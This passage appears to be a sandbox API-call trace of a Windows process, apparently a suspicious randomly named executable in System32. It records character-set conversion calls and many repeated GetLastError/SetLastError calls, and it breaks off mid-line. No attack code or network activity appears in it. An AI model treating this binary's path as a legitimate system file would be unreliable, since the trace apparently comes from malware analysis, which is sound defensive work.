\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2ef8b4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x02I\x9aôìú.", lpUsedDefaultChar=0x0) returned 256 [0034.606] GetLastError () returned 0x0 [0034.606] SetLastError (dwErrCode=0x0) [0034.606] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.606] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x2ef308, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᮋ矲狰Ā") returned 256 [0034.606] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᮋ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.606] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᮋ矲狰Ā", cchSrc=256, lpDestStr=0x2ef0f8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.606] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2ef7b4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x02I\x9aôìú.", lpUsedDefaultChar=0x0) returned 256 [0034.606] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.606] GetLastError () returned 0x0 [0034.606] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.607] SetLastError (dwErrCode=0x0) [0034.607] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.608] SetLastError (dwErrCode=0x0) [0034.608] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.609] SetLastError (dwErrCode=0x0) [0034.609] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.610] GetLastError () returned 0x0 [0034.610] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.611] SetLastError (dwErrCode=0x0) [0034.611] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.612] SetLastError (dwErrCode=0x0) [0034.612] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.613] SetLastError (dwErrCode=0x0) [0034.613] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.614] SetLastError (dwErrCode=0x0) [0034.614] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.615] SetLastError (dwErrCode=0x0) [0034.615] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.623] SetLastError (dwErrCode=0x0) [0034.623] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.624] SetLastError (dwErrCode=0x0) [0034.624] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.625] SetLastError (dwErrCode=0x0) [0034.625] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.626] SetLastError (dwErrCode=0x0) [0034.626] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.627] SetLastError (dwErrCode=0x0) [0034.627] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError (dwErrCode=0x0) [0034.628] GetLastError () returned 0x0 [0034.628] SetLastError 